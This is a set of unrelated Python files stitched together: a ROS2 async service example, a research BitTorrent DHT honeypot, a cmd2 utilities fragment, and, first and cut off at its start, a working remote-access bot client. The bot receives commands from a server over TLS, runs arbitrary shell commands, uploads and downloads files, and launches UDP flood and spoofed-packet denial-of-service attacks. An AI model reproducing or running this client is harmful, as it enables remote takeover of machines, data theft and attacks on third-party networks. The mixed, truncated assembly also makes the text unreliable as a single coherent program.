__maintainer__ = "Kolokotronis Panagiotis"
def exponential_backoff(c_factor):
"""Calculate backoff time for reconnect."""
return int(((2**c_factor)-1)/2)
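# A quick sanity check of the backoff curve (values follow directly from the formula):
# c_factor 0..5 -> 0, 0, 1, 3, 7, 15 seconds between reconnect attempts.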
def sys_info():
"""Get platform info."""
import platform
sys_info_tup = platform.uname()
return (sys_info_tup[0], sys_info_tup[1])
def get_len(in_string, max_len):
"""Calculate string length, return as a string with trailing 0s.
Keyword argument(s):
in_string -- input string
max_len -- length of returned string
"""
tmp_str = str(len(in_string))
len_to_return = tmp_str
for _ in range(max_len - len(tmp_str)):
len_to_return = '0' + len_to_return
return len_to_return
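# For example, get_len("hello", 2) returns "05" and get_len("hello", 13) returns
# "0000000000005"; this zero-padded length field frames every message exchanged
# with the server in the Client class below.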
def udp_flood_start(target_ip, target_port, msg):
"""Create UDP packet and send it to target_ip, target_port."""
flood_sock = socket(AF_INET, SOCK_DGRAM)
while True:
flood_sock.sendto(bytes(msg), (target_ip, target_port))
sleep(0.01)
def udp_spoof_pck(dest_ip, dest_port, source_ip, source_port, payload):
"""Create and return a spoofed UDP packet.
Keyword argument(s):
dest_ip -- the desired destination ip
dest_port -- the desired destination port
source_ip -- the desired source ip
source_port -- the desired source port
"""
from pinject import UDP, IP
udp_header = UDP(source_port, dest_port, payload).pack(source_ip, dest_ip)
ip_header = IP(source_ip, dest_ip, udp_header, IPPROTO_UDP).pack()
return ip_header+udp_header+payload
def udp_spoof_start(target_ip, target_port, spoofed_ip, spoofed_port, payload):
"""Spoof a packet and send it to target_ip, target_port.
Keyword argument(s):
target_ip -- the desired destination ip
target_port -- the desired destination port
spoofed_ip -- the desired source ip
spoofed_port -- the desired source port
"""
spoofed_packet = udp_spoof_pck(target_ip, target_port, spoofed_ip,
spoofed_port, payload)
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
while True:
sock.sendto(spoofed_packet, (target_ip, target_port))
sleep(0.01)
class Client(object):
"""Class for Client."""
def __init__(self, addr, port=9000):
self.sock = socket(AF_INET, SOCK_STREAM)
try:
cntx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        except AttributeError:  # PROTOCOL_* constants are merged into PROTOCOL_TLS as of Python 2.7.13
cntx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.sock = cntx.wrap_socket(self.sock)
self.address = addr
self.port = int(port)
self.quit_signal = False
self.version = ("%s-%s" %(__version__, "full"))
self.plugins = {}
self.comm_dict = {
'00000' : 'killMe',
'00001' : 'getFile',
'00002' : 'getBinary',
'00003' : 'sendFile',
'00004' : 'sendBinary',
'00005' : 'udpFlood',
'00006' : 'udpSpoof',
'00007' : 'command',
'00008' : 'KILL',
'00009' : 'loadPlugin',
'00010' : 'unloadPlugin'
}
self.comm_swtch = {
'killMe' : self.kill_me,
'getFile' : self.get_file,
'getBinary' : self.get_binary,
'sendFile' : self.send_file,
'sendBinary': self.send_binary,
'udpFlood' : self.udp_flood,
'udpSpoof' : self.udp_spoof,
'command' : self.run_cm,
'loadPlugin': self.load_plugin,
'unloadPlugin': self.unload_plugin
}
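        # Wire format as implemented by the methods below: the server first sends
        # a 5-byte command code from comm_dict; commands that carry a body are
        # followed by a fixed-width decimal length (e.g. 3 digits for file names,
        # 13 digits for shell commands and file contents) and that many bytes of
        # payload.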
def loop(self):
"""Client's main body. Accept and execute commands."""
while not self.quit_signal:
en_data = self.receive(5)
try:
en_data = self.comm_dict[en_data]
except KeyError:
if en_data == '':
self.reconnect()
continue
self.comm_swtch[en_data]()
self.sock.shutdown(SHUT_RDWR)
self.sock.close()
def connect(self):
"""Connect to the Server."""
try:
self.sock.connect((self.address, self.port))
###Send Version###
msg_len = get_len(self.version, 2) # len is 2-digit (i.e. up to 99 chars)
en_stdout = self.send(msg_len)
en_stdout = self.send(self.version)
##################
sys_type, sys_hname = sys_info()
###Send System Type###
msg_len = get_len(sys_type, 2) # len is 2-digit (i.e. up to 99 chars)
en_stdout = self.send(msg_len)
en_stdout = self.send(sys_type)
######################
###Send Hostname###
if sys_hname == "":
sys_hname = "None"
msg_len = get_len(sys_hname, 2) # len is 2-digit (i.e. up to 99 chars)
en_stdout = self.send(msg_len)
en_stdout = self.send(sys_hname)
###################
        except (sock_error, ValueError):
raise sock_error
return 0
def reconnect(self):
"""Attempt to reconnect after connection loss."""
# Take an exponential backoff-ish approach
c_factor = 0
connected = False
while not connected:
try:
self.connect()
except sock_error:
sleep(exponential_backoff(c_factor))
c_factor += 1
else:
connected = True
def send(self, data):
"""Send data to Server."""
r_code = 0
try:
self.sock.send(data)
except sock_error:
r_code = 1
self.reconnect()
return r_code
def receive(self, size):
"""Receive data from Server."""
data = self.sock.recv(size)
if data == '':
self.reconnect()
raise sock_error
return data
def kill_me(self):
"""Close socket, terminate script's execution."""
self.quit_signal = True
def run_cm(self):
"""Get command to run from server, execute it and send results back."""
command_size = self.receive(13)
command = self.receive(int(command_size))
comm = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, stdin=PIPE)
stdout, stderr = comm.communicate()
if stderr:
decode = stderr.decode('UTF-8')
elif stdout:
decode = stdout.decode('UTF-8')
else:
decode = 'Command has no output'
len_decode = get_len(decode, 13)
en_stdout = self.send(len_decode)
if en_stdout == 0:
en_stdout = self.send(decode)
return 0
def get_file(self):
"""Get file name and contents from server, create file."""
exit_code = 0
fname_length = self.receive(3) # Filename length up to 999 chars
fname = self.receive(int(fname_length))
try:
file_to_write = open(fname, 'w')
stdout = 'fcs'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
f_size = self.receive(13) # File size up to 9999999999999 chars
en_data = self.receive(int(f_size))
file_to_write.write(en_data)
file_to_write.close()
stdout = "fsw"
en_stdout = self.send(stdout)
else:
file_to_write.close()
return exit_code
def get_binary(self):
"""Get binary name and contents from server, create binary."""
exit_code = 0
bname_length = self.receive(3) # Filename length up to 999 chars
bname = self.receive(int(bname_length))
try:
bin_to_write = open(bname, 'wb')
stdout = 'fcs'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
b_size = self.receive(13) # Binary size up to 9999999999999 symbols
en_data = self.receive(int(b_size))
bin_to_write.write(en_data)
bin_to_write.close()
stdout = "fsw"
en_stdout = self.send(stdout)
else:
bin_to_write.close()
return exit_code
def send_file(self):
"""Get file name from server, send contents back."""
exit_code = 0
fname_length = self.receive(3) # Filename length up to 999 chars
fname = self.receive(int(fname_length))
try:
file_to_send = open(fname, 'r')
stdout = 'fos'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
file_cont = file_to_send.read()
file_to_send.close()
stdout = get_len(file_cont, 13)
en_stdout = self.send(stdout)
if en_stdout == 0:
stdout = file_cont
en_stdout = self.send(stdout)
else:
file_to_send.close()
return exit_code
def send_binary(self):
"""Get binary name from server, send contents back."""
exit_code = 0
bname_length = self.receive(3) # Filename length up to 999 chars
bname = self.receive(int(bname_length))
try:
bin_to_send = open(bname, 'rb')
stdout = 'fos'
except IOError:
stdout = 'fna'
exit_code = 1
en_stdout = self.send(stdout)
else:
en_stdout = self.send(stdout)
if en_stdout == 0:
bin_cont = bin_to_send.read()
bin_to_send.close()
stdout = get_len(bin_cont, 13)
en_stdout = self.send(stdout)
if en_stdout == 0:
stdout = bin_cont
en_stdout = self.send(stdout)
else:
bin_to_send.close()
return exit_code
def udp_flood(self):
"""Get target ip and port from server, start UPD flood wait for 'KILL'."""
en_data = self.receive(3) # Max ip+port+payload length 999 chars
en_data = self.receive(int(en_data))
en_data = en_data.split(":")
target_ip = en_data[0]
target_port = int(en_data[1])
msg = en_data[2]
proc = Process(target=udp_flood_start, args=(target_ip, target_port, msg))
proc.start()
killed = False
while not killed:
en_data = self.receive(5)
try:
en_data = self.comm_dict[en_data]
except KeyError:
continue
if en_data == 'KILL':
proc.terminate()
killed = True
return 0
def udp_spoof(self):
"""Get target/spoofed ip and port from server, start UPD spoof wait for 'KILL'."""
en_data = self.receive(3) # Max ip+port+spoofedip+spoofed port+payload length 999 chars
en_data = self.receive(int(en_data))
en_data = en_data.split(":")
target_ip = en_data[0]
target_port = int(en_data[1])
spoofed_ip = en_data[2]
spoofed_port = int(en_data[3])
payload = en_data[4].encode('UTF-8')
proc = Process(target=udp_spoof_start, args=(target_ip, target_port,
spoofed_ip, spoofed_port,
payload))
proc.start()
killed = False
while not killed:
en_data = self.receive(5)
try:
en_data = self.comm_dict[en_data]
except KeyError:
continue
if en_data == 'KILL':
proc.terminate()
killed = True
return 0
def load_plugin(self):
"""Asyncronously load a plugin."""
en_data = self.receive(3) # Max plugin name length 999 chars
en_data = self.receive(int(en_data))
try:
self.plugins[en_data] = __import__(en_data)
self.send("psl")
except ImportError:
self.send("pnl")
def unload_plugin(self):
"""Asyncronously unload a plugin."""
en_data = self.receive(3) # Max plugin name length 999 chars
en_data = self.receive(int(en_data))
try:
            del self.plugins[en_data]
        except KeyError:
pass
class PluginMount(type):
def __init__(cls, name, base, attr):
"""Called when a Plugin derived class is imported
Gathers all methods needed from __cmd_states__ to __server_cmds__"""
tmp = cls()
for fn in cls.__client_cmds__:
# Load the function (if its from the current plugin) and see if
# it's marked. All plugins' commands are saved as function names
# without saving from which plugin they come, so we have to mark
# them and try to load them
if cls.__client_cmds__ is not None:
continue
try:
f = getattr(tmp, fn)
if f.__is_command__:
cls.__server_cmds__[fn] = f
except AttributeError:
pass
class Plugin(object):
"""Plugin class (to be extended by plugins)"""
__metaclass__ = PluginMount
__client_cmds__ = {}
# Plugin decorator
def command(fn):
Plugin.__client_cmds__[fn.__name__] = None
return fn
def main():
"""Main function. Handle object instances."""
try:
rhost = argv[1]
except IndexError:
sysexit()
try:
myself = Client(rhost, argv[2])
except IndexError:
myself = Client(rhost)
try:
myself.connect()
except sock_error:
myself.reconnect()
myself.loop()
#Start Here!
if __name__ == '__main__':
freeze_support()
Process(target=main).start()
|
service.py
|
import asyncio
import itertools
import threading
import time
import rclpy
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.executors import SingleThreadedExecutor
from rclpy.node import Node
from std_srvs.srv import SetBool
import asyncx
import asyncx_ros2
_thread = asyncx.EventLoopThread()
SERVICE_NAME = "example_add"
class NodeBase(Node):
def __init__(self, node_name: str) -> None:
super().__init__(node_name)
self._name = node_name
self._thread = threading.Thread(target=self._spin)
self._executor = SingleThreadedExecutor()
def _spin(self) -> None:
rclpy.spin(self, executor=self._executor)
def start(self) -> None:
self._thread.start()
def stop(self) -> None:
print(f"Stopping node: {self._name}")
self._executor.shutdown(timeout_sec=0.1)
class Server(NodeBase):
def __init__(self) -> None:
super().__init__("server")
self._server = self.create_service(
SetBool,
SERVICE_NAME,
self._set_bool,
callback_group=ReentrantCallbackGroup(),
)
self._counter = itertools.count()
@asyncx_ros2.wrap_as_ros_coroutine(_thread.get_loop)
async def _set_bool(
self, request: SetBool.Request, response: SetBool.Response
) -> SetBool.Response:
stime = time.time()
val = next(self._counter)
self.get_logger().info(f"counter={val}, get request")
await asyncio.sleep(1.0)
elapsed = time.time() - stime
self.get_logger().info(f"counter={val}, return response (elapsed: {elapsed})")
return response
class Client(NodeBase):
def __init__(self) -> None:
super().__init__("client")
self._client = self.create_client(
SetBool,
SERVICE_NAME,
callback_group=ReentrantCallbackGroup(),
)
self._timer = self.create_timer(
0.5,
self.timer_callback,
callback_group=ReentrantCallbackGroup(),
)
self._counter = itertools.count()
def run(self) -> None:
executor = SingleThreadedExecutor()
rclpy.spin(self, executor=executor)
async def _get_request(self, val: int) -> SetBool.Request:
request = SetBool.Request()
request.data = val % 2 == 0
await asyncio.sleep(1.0)
return request
@asyncx_ros2.wrap_as_ros_coroutine(_thread.get_loop)
async def timer_callback(self) -> None:
stime = time.time()
val = next(self._counter)
self.get_logger().info(f"counter={val}, timer callback")
request = await self._get_request(val)
self.get_logger().info(f"counter={val}, send request")
await asyncx_ros2.ensure_aio_future(self._client.call_async(request))
elapsed = time.time() - stime
self.get_logger().info(f"counter={val}, completed (elapsed: {elapsed})")
def main() -> None:
rclpy.init()
with _thread:
print("Press enter to stop")
server = Server()
client = Client()
server.start()
client.start()
try:
input()
finally:
print("Terminating nodes")
client.stop()
server.stop()
server.destroy_node()
client.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
honeypot.I.py
|
#!/usr/bin/env python
#
# This script is an experimental honeypot.
#
# Liang Wang @ Dept. Computer Science, University of Helsinki, Finland
# 2011.10.03
#
import os
import sys
import socket
import pickle
import time
import threading
import resource
from honeypot_bt import *
from khash import *
from bencode import bencode, bdecode
from common import *
from multiprocessing import *
BUCKET_LIMIT = 8
HONEYPOT_NAME = "TEST"
class Honeypot(object):
def __init__(self, id = None):
self._debug = False # Output extra info or not
self.id = id if id else newID() # Honeypot's ID
self.ip = get_myip() # my ip
self.port = get_port() # my listening port
self.btport = self.port + 0 # The port running BT protocol
self.krpc = KRPC() # Simple KRPC translator
self.buckets = [] # Bucket structure holding the known nodes
self.nodePool = {} # Dict of the nodes collected
self.addrPool = {} # Dict uses <ip,port> as its key
self.nodeQueue = Queue(0) # Queue of the nodes to scan
self.counter = 5 # How long to wait after a queue is empty
self.startTime = time.time() # Time start the honeypot
self.duplicates = 0 # How many duplicates among returned nodes
self.total = 1 # Total number of returned nodes
self.respondent = 0 # Number of respondent
self.honey = [] # Honey used to lure our prey
self.tn = 0 # Number of nodes in a specified n-bit zone
self.tnold = 0
self.tntold = 0
self.tnspeed = 0
self.ndist = 2**160-1
self.isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.isock.bind( ("",self.port) )
self.isock_lock = threading.Lock()
pass
def add_to_bucket(self, node):
"""Add a node into the bucket, the interval is like this [x,y)"""
if not len(self.buckets):
self.buckets = [ [[0,2**160], []] ]
id = intify(node["id"])
bucket = None
        # Find the proper bucket for the new node
for x in self.buckets:
r, nl = x
if id >= r[0] and id < r[1]:
bucket = x
break
# OK, find the bucket for the new node
if bucket:
r, nl = bucket
            # If the bucket is full
            if len(nl) >= BUCKET_LIMIT:
                # is the new node 'near to me'?
if self.is_in_bucket(self.id, bucket):
# split the bucket
x, y = r
m = ((y-x)>>1) + x
new_bucket = [ [x,m], [] ]
bucket[0] = [m,y]
pos = self.buckets.index(bucket)
self.buckets.insert(pos, new_bucket)
for n in nl:
tid = intify(n["id"])
if tid < m:
nl.remove(n)
new_bucket[1].append(n)
# Recursion
self.add_to_bucket(node)
pass
                # if the node is far from me and the bucket is full, drop it.
else:
pass
# OK, we have spare place for new nodes.
else:
nl.append(node)
pass
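    # Rough walk-through of the splitting rule above (illustrative numbers only):
    # with BUCKET_LIMIT = 8, once the single bucket [0, 2**160) holds 8 nodes and
    # our own id falls inside it, it is split at the midpoint 2**159 into
    # [0, 2**159) and [2**159, 2**160), existing nodes are redistributed, and the
    # insertion is retried recursively; buckets that do not contain our own id
    # simply drop further nodes once full.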
def remove_from_bucket(self, id, buckets):
"""Remove a node from a bucket"""
bucket = self.in_which_bucket(id, buckets)
node = self.is_in_bucket(id, bucket)
bucket[1].remove(node)
# if the bucket is empty, then merge with others
if len(bucket[1])==0 and len(buckets)>1:
x, y = bucket[0]
pos = buckets.index(bucket)
prev = max(pos-1,0)
next = min(pos+1,len(buckets)-1)
px, py = buckets[prev][0]
nx, ny = buckets[next][0]
if pos==prev or ( pos!=prev and (ny-nx)==(y-x) ):
buckets[next][0] = [x,ny]
elif pos==next or ( pos!=next and (py-px)==(y-x) ):
buckets[prev][0] = [px,y]
buckets.remove(bucket)
pass
def is_in_bucket(self, id, bucket):
"""Given the id and the bucket, check if the id is in the bucket"""
node = None
r, nl = bucket
for n in nl:
if id == n['id']:
node = n
break
return node
def in_which_bucket(self, id, buckets):
"""Given the id, check which bucket it is in"""
b = None
for bucket in buckets:
if self.is_in_bucket(id, bucket):
b = bucket
break
return b
def bootstrap(self):
"""Bootstrap myself"""
self.add_to_bucket({"id":self.id, "host":self.ip, "port":self.port})
self.findNode("router.bittorrent.com", 6881, self.id)
# Try to boot from local nodecache
if os.path.exists("nodescache"):
nl = pickle.load(open("nodescache","r"))
for n in nl:
self.findNode(n["host"], n["port"], self.id)
pass
def nearest(self, target, nl, limit=None):
"""Given the node list and the target id, return the nearest ones."""
        l = []
for n in nl:
l += [(distance(n["id"], target), n)]
l.sort()
m = [ n[1] for n in l[:limit] ]
return m
def ping(self, host, port):
mtid = 3
args = {"id":self.id}
d = {TID : chr(mtid), TYP : REQ, REQ : "ping", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def findNode(self, host, port, target):
mtid = 5
args = {"id":self.id, "target":target}
d = {TID : chr(mtid), TYP : REQ, REQ : "find_node", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def announcePeer(self, host, port, infohash, token, mtid=None):
mtid = 7 if mtid==None else mtid
args = {"id":self.id, "info_hash":infohash, "port":self.port, "token":token}
d = {TID : chr(mtid), TYP : REQ, REQ : "announce_peer", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def getPeers(self, host, port, infohash, mtid=None):
mtid = 11 if mtid==None else mtid
args = {"id":self.id, "info_hash":infohash}
d = {TID : chr(mtid), TYP : REQ, REQ : "get_peers", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
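    # The four request builders above (ping / findNode / getPeers / announcePeer)
    # share the same KRPC envelope before encoding:
    #   {TID: <one-byte transaction id>, TYP: REQ, REQ: <method name>, ARG: <args dict>}
    # TID, TYP, REQ and ARG are constants supplied by the imported helper modules.
    # For get_peers the transaction id doubles as an index into self.honey, which
    # is how start_listener() maps a "token" response back to the queried infohash.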
def processNodes(self, nodes):
timestamp = time.time()
nodes = self.nearest(self.id, nodes)
for node in nodes:
id = node["id"]
node["timestamp"] = timestamp
node["rtt"] = float('inf')
if id not in self.nodePool:
self.nodePool[id] = [node]
self.convergeSpeed(node)
if id != self.id:
self.findNode(node["host"], node["port"], self.id)
for i in range(len(self.honey)):
# Liang: Test purpose
#if node["host"] == "50.18.3.51" or node["host"] == "184.72.3.99":
# print "*"*50, node["host"], node["port"]
if True:
infohash = self.honey[i]
self.getPeers(node["host"], node["port"], infohash, i)
else:
if not self.hasNode(node["id"], node["host"], node["port"])\
and id != self.id:
self.nodePool[id].append(node)
else:
self.duplicates += 1
self.total += 1
pass
def hasNode(self, id, host, port):
r = None
for n in self.nodePool[id]:
if n["host"] == host and n["port"] == port:
r = n
break
return r
def handle_find_node(self, tid):
tid = intify(tid)
bucket = None
for x in self.buckets:
r, nl = x
if tid >= r[0] and tid < r[1]:
bucket = x
break
return bucket[1]
def sendMsg(self, msg, addr):
"""Send the message through isock, thread safe"""
self.isock_lock.acquire()
try:
self.isock.sendto(msg, addr)
except Exception, err:
if self._debug:
print "Exception:Honeypot.sendMsg():", err, addr
pass
self.isock_lock.release()
pass
def serialize(self):
obj = {}
for k, nlist in self.nodePool.items():
for v in nlist:
addr = (v['host'], v['port'])
if addr in self.addrPool:
v["rtt"] = self.addrPool[addr]["timestamp"]- v["timestamp"]
obj[k] = obj.get(k, []) + [v]
timestamp = time.strftime("%Y%m%d%H%M%S")
f = open("nodes.%s.%s" % (timestamp, str(intify(self.id))), "w")
pickle.Pickler(f).dump(obj)
f.close()
pass
def start_listener(self):
"""Process all the incomming messages here"""
timestamp = time.strftime("%Y%m%d%H%M%S")
log = open("honeypot.%s.%s.log" % (HONEYPOT_NAME, timestamp), "a")
while True:
try:
msg, addr = self.isock.recvfrom(PACKET_LEN)
d = None
d = self.krpc.decodeMsg(msg)
ts = time.time()
# Liang: for test purpose
func_s = ""
if d["TYP"] == REQ:
func_s = d["MSG"]
#if d["TYP"] == RSP and "nodes" not in d["MSG"]:
# print d
if self._debug:
print time.ctime(), addr, d["TYP"], func_s #, d["MSG"], d["ARG"]
# Add to bucket if it is a new node, otherwise update it.
tid = d["MSG"]["id"] if d["TYP"] == RSP else d["ARG"]["id"]
bucket = self.in_which_bucket(tid, self.buckets)
if bucket:
pass
else:
n = {"id":tid, "host":addr[0], "port":addr[1], \
"timestamp":ts, "lastupdate":ts}
self.add_to_bucket(n)
# Process message according to their message type
if d["TYP"] == RSP:
if "nodes" in d["MSG"]:
tdist = distance(self.id, d["MSG"]["id"])
if tdist < self.ndist:
self.ndist = tdist
self.processNodes(unpackNodes(d["MSG"]["nodes"]))
#print tdist, "+"*100
elif self.respondent < 100000:
self.processNodes(unpackNodes(d["MSG"]["nodes"]))
if "token" in d["MSG"]:
trans_id = ord(d["TID"])
infohash = self.honey[trans_id]
token = d["MSG"]["token"]
#self.announcePeer(addr[0], addr[1], infohash, token, trans_id)
elif d["TYP"] == REQ:
#print addr, d["TID"], d["TYP"], d["MSG"], d["ARG"]
if "ping" == d["MSG"].lower():
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp = self.krpc.encodeMsg(rsp)
self.sendMsg(rsp, addr)
pass
elif "find_node" == d["MSG"].lower():
nodes = self.handle_find_node(d["ARG"]["target"])
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp[RSP]["nodes"] = packNodes(nodes)
rsp = self.krpc.encodeMsg(rsp)
self.sendMsg(rsp, addr)
pass
elif "get_peers" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
# Liang: Hurray, catch U!
if infohash in self.honey and addr[0] != self.ip:
log.write("%s\tget_peers\t%i\n" % (str(addr),intify(infohash)))
print "+"*100, "get_peers", addr
infohash = d["ARG"]["info_hash"]
# lure the node to bt protocol
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id, "token":"test"}}
rsp[RSP]["values"] = packPeers( [(self.ip,self.port)] )
rsp = self.krpc.encodeMsg(rsp)
#self.sendMsg(rsp, addr)
# Liang: Jump to individual talk now
# self.individual_talk(addr)
pass
elif "announce_peer" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
if infohash in self.honey:
log.write("%s\tannounce_peer\n" % (str(addr)))
if self._debug:
print "-"*100, "announce_peer", addr
pass
else:
pass
#self.addrPool[addr] = {"timestamp":time.time()}
self.respondent += 1
log.flush()
except Exception, err:
if self._debug:
print "Exception:Honeypot.listener():", err, repr(msg)
pass
pass
def individual_talk(self, taddr):
while True:
try:
msg, addr = self.isock.recvfrom(PACKET_LEN)
                # ignore irrelevant messages
if addr != taddr:
continue
d = self.krpc.decodeMsg(msg)
ts = time.time()
tid = d["MSG"]["id"] if d["TYP"] == RSP else d["ARG"]["id"]
if self._debug:
print d
# Process message according to their message type
if d["TYP"] == RSP:
pass
elif d["TYP"] == REQ:
if "ping" == d["MSG"].lower():
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp = self.krpc.encodeMsg(rsp)
#self.sendMsg(rsp, addr)
pass
elif "find_node" == d["MSG"].lower():
nodes = self.handle_find_node(d["ARG"]["target"])
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp[RSP]["nodes"] = packNodes(nodes)
rsp = self.krpc.encodeMsg(rsp)
#self.sendMsg(rsp, addr)
pass
elif "get_peers" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id, "token":"test"}}
rsp[RSP]["values"] = packPeers( [(self.ip,self.btport)] )
rsp = self.krpc.encodeMsg(rsp)
self.sendMsg(rsp, addr)
pass
elif "announce_peer" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
if infohash in self.honey:
print "-"*100, "announce_peer", addr
pass
else:
pass
except Exception, err:
if self._debug:
print "Exception:Honeypot.individual_talk():", err, repr(msg)
pass
sys.exit(0)
pass
def start_sender(self):
while True:
try:
now = time.time()
# Re-populate myself every 5 minutes
if int(now)%300==0:
self.nodePool = {}
self.buckets = []
self.respondent = 0
self.bootstrap()
time.sleep(1)
pass
except Exception, err:
if self._debug:
print "Exception:Honeypot.start_sender()", err
pass
def start(self):
t1 = threading.Thread(target=self.start_listener, args=())
t1.daemon = True
t1.start()
t2 = threading.Thread(target=self.start_sender, args=())
t2.daemon = True
t2.start()
peer = Peer(self.btport)
peer.honey = self.honey
t3 = threading.Thread(target=peer.start_listen, args=())
t3.daemon = True
t3.start()
# Liang: test purpose
self.test_184()
self.bootstrap()
while True:
try:
#self.info()
time.sleep(1)
except KeyboardInterrupt:
break
except Exception, err:
if self._debug:
print "Exception:Honeypot.start_crawl()", err
pass
def info(self):
print "[NodeSet]:%i\t\t[12-bit Zone]:%i [%i/s]\t\t[Response]:%.2f%%\t\t[Queue]:%i\t\t[Dup]:%.2f%%" % \
(len(self.nodePool), self.tn, self.tnspeed,
self.respondent*100.0/max(1,len(self.nodePool)),
self.nodeQueue.qsize(), self.duplicates*100.0/self.total)
pass
def convergeSpeed(self,node):
if (distance(self.id, node["id"])>>148)==0:
self.tn += 1
if (time.time()-self.tntold) >= 5:
self.tnspeed = int((self.tn-self.tnold)/(time.time()-self.tntold))
self.tnold = self.tn
self.tntold = time.time()
pass
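    # Note on the shift above: distance() (imported from khash) is presumably the
    # Kademlia XOR metric over 160-bit IDs, so a result that is zero after >> 148
    # means the node shares the honeypot's top 12 bits -- this is the
    # "[12-bit Zone]" counter reported by info().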
def test_bucket(self):
self.bootstrap()
id_set = set()
print "Add"
for i in range(50000):
id = newID()
node = {"id":id}
self.add_to_bucket(node)
id_set.add(id)
for x in self.buckets:
print len(x[1])
print "Remove"
for id in id_set:
if self.in_which_bucket(id, self.buckets):
self.remove_from_bucket(id, self.buckets)
pass
for x in self.buckets:
print len(x[1])
pass
def test_184(self):
for i in range(len(self.honey)):
infohash = self.honey[i]
for j in range(500):
print "getPeer", repr(infohash)
self.getPeers("50.18.3.51", 11000+j, infohash, i)
pass
def start_injecting(id):
"""Start all the honeypots"""
honeypot = Honeypot(id)
honeypot.start()
pass
def create_fake_info(self):
info = {}
info["name"] = "Rise.of.the.Planet.of.the.Apes.2011.dvdrip.XviD-NOVA.avi"
info["length"] = 1468095404
info["piece length"] = 2**20
info["pieces"] = "".join([ newID() for i in range(math.ceil(info["length"]*1.0/info["piece length"])) ])
return info
if __name__=="__main__":
now = time.time()
#id = stringify(long(sys.argv[1])) if len(sys.argv)>1 else newID()
id = intify(newID())
honey = [ stringify(id+i) for i in range(1, 11) ]
id = stringify(id)
honeypot = Honeypot(id)
honeypot.honey = honey
honeypot.start()
print "%.2f minutes" % ((time.time() - now)/60.0)
#honeypot.serialize()
pass
|
utils.py
|
# coding=utf-8
"""Shared utility functions"""
import argparse
import collections
import functools
import glob
import inspect
import itertools
import os
import re
import subprocess
import sys
import threading
import unicodedata
from enum import (
Enum,
)
from typing import (
IO,
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Optional,
TextIO,
Type,
TypeVar,
Union,
cast,
)
from . import (
constants,
)
from .argparse_custom import (
ChoicesProviderFunc,
ChoicesProviderFuncWithTokens,
CompleterFunc,
CompleterFuncWithTokens,
)
if TYPE_CHECKING: # pragma: no cover
import cmd2 # noqa: F401
_T = TypeVar('_T')
def is_quoted(arg: str) -> bool:
"""
Checks if a string is quoted
:param arg: the string being checked for quotes
:return: True if a string is quoted
"""
return len(arg) > 1 and arg[0] == arg[-1] and arg[0] in constants.QUOTES
def quote_string(arg: str) -> str:
"""Quote a string"""
if '"' in arg:
quote = "'"
else:
quote = '"'
return quote + arg + quote
def quote_string_if_needed(arg: str) -> str:
"""Quote a string if it contains spaces and isn't already quoted"""
if is_quoted(arg) or ' ' not in arg:
return arg
return quote_string(arg)
def strip_quotes(arg: str) -> str:
"""Strip outer quotes from a string.
Applies to both single and double quotes.
:param arg: string to strip outer quotes from
:return: same string with potentially outer quotes stripped
"""
if is_quoted(arg):
arg = arg[1:-1]
return arg
def str_to_bool(val: str) -> bool:
"""Converts a string to a boolean based on its value.
:param val: string being converted
:return: boolean value expressed in the string
:raises: ValueError if the string does not contain a value corresponding to a boolean value
"""
if isinstance(val, str):
if val.capitalize() == str(True):
return True
elif val.capitalize() == str(False):
return False
raise ValueError("must be True or False (case-insensitive)")
class Settable:
"""Used to configure an attribute to be settable via the set command in the CLI"""
def __init__(
self,
name: str,
val_type: Union[Type[Any], Callable[[Any], Any]],
description: str,
settable_object: object,
*,
settable_attrib_name: Optional[str] = None,
onchange_cb: Optional[Callable[[str, _T, _T], Any]] = None,
choices: Optional[Iterable[Any]] = None,
choices_provider: Optional[Union[ChoicesProviderFunc, ChoicesProviderFuncWithTokens]] = None,
completer: Optional[Union[CompleterFunc, CompleterFuncWithTokens]] = None,
):
"""
Settable Initializer
:param name: name of the instance attribute being made settable
:param val_type: callable used to cast the string value from the command line into its proper type and
even validate its value. Setting this to bool provides tab completion for true/false and
validation using str_to_bool(). The val_type function should raise an exception if it fails.
This exception will be caught and printed by Cmd.do_set().
:param description: string describing this setting
:param settable_object: Object to configure with the set command
:param settable_attrib_name: Attribute name to be modified. Defaults to `name` if not specified.
:param onchange_cb: optional function or method to call when the value of this settable is altered
by the set command. (e.g. onchange_cb=self.debug_changed)
Cmd.do_set() passes the following 3 arguments to onchange_cb:
param_name: str - name of the changed parameter
old_value: Any - the value before being changed
new_value: Any - the value after being changed
The following optional settings provide tab completion for a parameter's values. They correspond to the
same settings in argparse-based tab completion. A maximum of one of these should be provided.
:param choices: iterable of accepted values
:param choices_provider: function that provides choices for this argument
:param completer: tab completion function that provides choices for this argument
"""
if val_type == bool:
val_type = str_to_bool
choices = ['true', 'false']
self.name = name
self.val_type = val_type
self.description = description
